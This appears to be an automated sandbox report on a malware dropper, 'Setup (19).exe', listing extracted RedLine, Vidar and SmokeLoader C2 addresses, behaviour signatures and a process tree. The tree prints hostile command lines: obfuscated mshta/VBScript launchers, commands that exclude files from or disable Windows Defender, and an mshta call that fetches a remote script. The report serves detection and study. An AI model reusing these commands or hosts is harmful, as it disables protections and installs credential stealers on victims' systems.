Resubmissions

15-10-2024 15:36

241015-s1zlzasdkc 10

01-07-2024 18:32

240701-w6yteawhmq 10

01-07-2024 14:52

240701-r82wmaxdnd 10

01-07-2024 14:52

240701-r8syqa1dpp 10

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

Analysis

  • max time kernel
    202s
  • max time network
    262s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-08-2021 16:23

General

  • Target

    Setup (19).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

2608

C2

tambisup.com:9825

Extracted

Family

vidar

Version

40.1

Botnet

995

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    995

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 23 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Vidar Stealer 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Themida packer 9 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 7 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup (19).exe
    "C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    PID:740
    • C:\Users\Admin\Documents\Pxg7Yw1H6Ie1DXoUh_DcgVyx.exe
      "C:\Users\Admin\Documents\Pxg7Yw1H6Ie1DXoUh_DcgVyx.exe"
      2⤵
        PID:2060
      • C:\Users\Admin\Documents\nu1jOiLWabaXiTUVO3SQZUwH.exe
        "C:\Users\Admin\Documents\nu1jOiLWabaXiTUVO3SQZUwH.exe"
        2⤵
          PID:4032
        • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
          "C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe"
          2⤵
            PID:1620
            • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
              C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
              3⤵
                PID:5068
              • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                3⤵
                  PID:4456
                • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                  C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                  3⤵
                    PID:5684
                  • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                    C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                    3⤵
                      PID:4076
                    • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                      C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                      3⤵
                        PID:2268
                      • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                        C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                        3⤵
                          PID:1000
                        • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                          C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                          3⤵
                            PID:5704
                          • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                            C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                            3⤵
                              PID:2064
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 24
                                4⤵
                                • Program crash
                                PID:6472
                            • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                              C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                              3⤵
                                PID:6380
                              • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                3⤵
                                  PID:5992
                                • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                  C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                  3⤵
                                    PID:5360
                                  • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                    C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                    3⤵
                                      PID:6896
                                    • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                      C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                      3⤵
                                        PID:6312
                                      • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                        C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                        3⤵
                                          PID:2836
                                        • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                          C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                          3⤵
                                            PID:1444
                                          • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                            C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                            3⤵
                                              PID:1216
                                            • C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                              C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe
                                              3⤵
                                                PID:6736
                                            • C:\Users\Admin\Documents\d3kvhwVhMIATLPaBAI4Bvv8Z.exe
                                              "C:\Users\Admin\Documents\d3kvhwVhMIATLPaBAI4Bvv8Z.exe"
                                              2⤵
                                                PID:3876
                                              • C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe
                                                "C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe"
                                                2⤵
                                                  PID:3124
                                                  • C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe
                                                    "C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe"
                                                    3⤵
                                                      PID:6544
                                                    • C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe
                                                      "C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe"
                                                      3⤵
                                                        PID:6584
                                                    • C:\Users\Admin\Documents\Pt7r7A9bTD9nQr6Wm90Ib58X.exe
                                                      "C:\Users\Admin\Documents\Pt7r7A9bTD9nQr6Wm90Ib58X.exe"
                                                      2⤵
                                                        PID:508
                                                      • C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe
                                                        "C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe"
                                                        2⤵
                                                          PID:2952
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
                                                            3⤵
                                                              PID:4668
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ( "C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe" ) do taskkill -F -im "%~NxQ"
                                                                4⤵
                                                                  PID:4396
                                                                  • C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE
                                                                    BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1
                                                                    5⤵
                                                                      PID:5872
                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                        "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
                                                                        6⤵
                                                                          PID:5644
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac
                                                                          6⤵
                                                                            PID:6388
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill -F -im "wvhv3FdipsxgaYLvJIs5Tjcs.exe"
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:5276
                                                                  • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                    "C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe"
                                                                    2⤵
                                                                      PID:3300
                                                                      • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                        C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                        3⤵
                                                                          PID:5116
                                                                        • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                          C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                          3⤵
                                                                            PID:5940
                                                                          • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                            C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                            3⤵
                                                                              PID:5252
                                                                            • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                              C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                              3⤵
                                                                                PID:5288
                                                                              • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                3⤵
                                                                                  PID:180
                                                                                • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                  C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                  3⤵
                                                                                    PID:2236
                                                                                  • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                    C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                    3⤵
                                                                                      PID:2268
                                                                                    • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                      C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                      3⤵
                                                                                        PID:3820
                                                                                      • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                        C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                        3⤵
                                                                                          PID:6492
                                                                                        • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                          C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                          3⤵
                                                                                            PID:5620
                                                                                          • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                            C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                            3⤵
                                                                                              PID:5340
                                                                                            • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                              C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                              3⤵
                                                                                                PID:7064
                                                                                              • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                3⤵
                                                                                                  PID:5056
                                                                                                • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                  C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                  3⤵
                                                                                                    PID:6476
                                                                                                  • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                    C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                    3⤵
                                                                                                      PID:4912
                                                                                                    • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                      C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                      3⤵
                                                                                                        PID:3812
                                                                                                      • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                        C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                        3⤵
                                                                                                          PID:6600
                                                                                                        • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                          C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                          3⤵
                                                                                                            PID:7148
                                                                                                          • C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                            C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe
                                                                                                            3⤵
                                                                                                              PID:1312
                                                                                                          • C:\Users\Admin\Documents\yqmBhSxDOKmMnBUrBeCPCXfn.exe
                                                                                                            "C:\Users\Admin\Documents\yqmBhSxDOKmMnBUrBeCPCXfn.exe"
                                                                                                            2⤵
                                                                                                              PID:2792
                                                                                                            • C:\Users\Admin\Documents\FmK70eFuh537bQSFAE0rVKQF.exe
                                                                                                              "C:\Users\Admin\Documents\FmK70eFuh537bQSFAE0rVKQF.exe"
                                                                                                              2⤵
                                                                                                                PID:1104
                                                                                                              • C:\Users\Admin\Documents\taO8WBe3sGY8JwP0WwKRGdeg.exe
                                                                                                                "C:\Users\Admin\Documents\taO8WBe3sGY8JwP0WwKRGdeg.exe"
                                                                                                                2⤵
                                                                                                                  PID:1032
                                                                                                                • C:\Users\Admin\Documents\JnolPXtCnUrhFlaaB0P1UpqF.exe
                                                                                                                  "C:\Users\Admin\Documents\JnolPXtCnUrhFlaaB0P1UpqF.exe"
                                                                                                                  2⤵
                                                                                                                    PID:2396
                                                                                                                    • C:\Users\Admin\Documents\JnolPXtCnUrhFlaaB0P1UpqF.exe
                                                                                                                      "C:\Users\Admin\Documents\JnolPXtCnUrhFlaaB0P1UpqF.exe"
                                                                                                                      3⤵
                                                                                                                        PID:4028
                                                                                                                    • C:\Users\Admin\Documents\J_odoucR52JMIAtSDtthVs1e.exe
                                                                                                                      "C:\Users\Admin\Documents\J_odoucR52JMIAtSDtthVs1e.exe"
                                                                                                                      2⤵
                                                                                                                        PID:3984
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\AdvancedRun.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                          3⤵
                                                                                                                            PID:5040
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\AdvancedRun.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\AdvancedRun.exe" /SpecialRun 4101d8 5040
                                                                                                                              4⤵
                                                                                                                                PID:5304
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\J_odoucR52JMIAtSDtthVs1e.exe" -Force
                                                                                                                              3⤵
                                                                                                                                PID:6000
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\J_odoucR52JMIAtSDtthVs1e.exe" -Force
                                                                                                                                3⤵
                                                                                                                                  PID:6088
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                  3⤵
                                                                                                                                    PID:3160
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                    3⤵
                                                                                                                                      PID:4900
                                                                                                                                  • C:\Users\Admin\Documents\xSbEWvMbZJGX8oX5aXjoprLd.exe
                                                                                                                                    "C:\Users\Admin\Documents\xSbEWvMbZJGX8oX5aXjoprLd.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:3960
                                                                                                                                      • C:\Users\Admin\Documents\xSbEWvMbZJGX8oX5aXjoprLd.exe
                                                                                                                                        "C:\Users\Admin\Documents\xSbEWvMbZJGX8oX5aXjoprLd.exe"
                                                                                                                                        3⤵
                                                                                                                                          PID:4572
                                                                                                                                      • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                        "C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe"
                                                                                                                                        2⤵
                                                                                                                                          PID:2528
                                                                                                                                          • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                            C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                            3⤵
                                                                                                                                              PID:5056
                                                                                                                                            • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                              C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                              3⤵
                                                                                                                                                PID:4444
                                                                                                                                              • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                3⤵
                                                                                                                                                  PID:5424
                                                                                                                                                • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                  C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5776
                                                                                                                                                  • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                    C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                    3⤵
                                                                                                                                                      PID:492
                                                                                                                                                    • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                      C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                      3⤵
                                                                                                                                                        PID:6060
                                                                                                                                                      • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                        C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2612
                                                                                                                                                        • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                          C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1656
                                                                                                                                                          • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                            C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3816
                                                                                                                                                            • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                              C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1012
                                                                                                                                                              • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6252
                                                                                                                                                                • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                  C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:6704
                                                                                                                                                                  • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                    C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5232
                                                                                                                                                                    • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                      C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4412
                                                                                                                                                                      • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                        C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2164
                                                                                                                                                                        • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                          C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6684
                                                                                                                                                                          • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                            C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:7132
                                                                                                                                                                            • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                              C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6776
                                                                                                                                                                              • C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                                C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:6172
                                                                                                                                                                              • C:\Users\Admin\Documents\cvlqiE2nW8rTgPchAfoAuHyT.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\cvlqiE2nW8rTgPchAfoAuHyT.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4064
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4616
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4536
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 260
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:3524
                                                                                                                                                                                    • C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1772
                                                                                                                                                                                        • C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5168
                                                                                                                                                                                          • C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5412
                                                                                                                                                                                          • C:\Users\Admin\Documents\8F8Du9NYE5TM4uHthdJ0FPew.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\8F8Du9NYE5TM4uHthdJ0FPew.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2924
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c9uN8dCk.com
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\c9uN8dCk.com"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1776
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6662.tmp\6663.tmp\6664.bat C:\Users\Admin\AppData\Local\Temp\c9uN8dCk.com"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:6816
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        sc config WinDefend start=disabled
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:1308
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5WpoSxqo.com
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\5WpoSxqo.com"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:6392
                                                                                                                                                                                                        • C:\Windows\System32\mshta.exe
                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:4120
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ZERFCR8P.com
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ZERFCR8P.com"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:6652
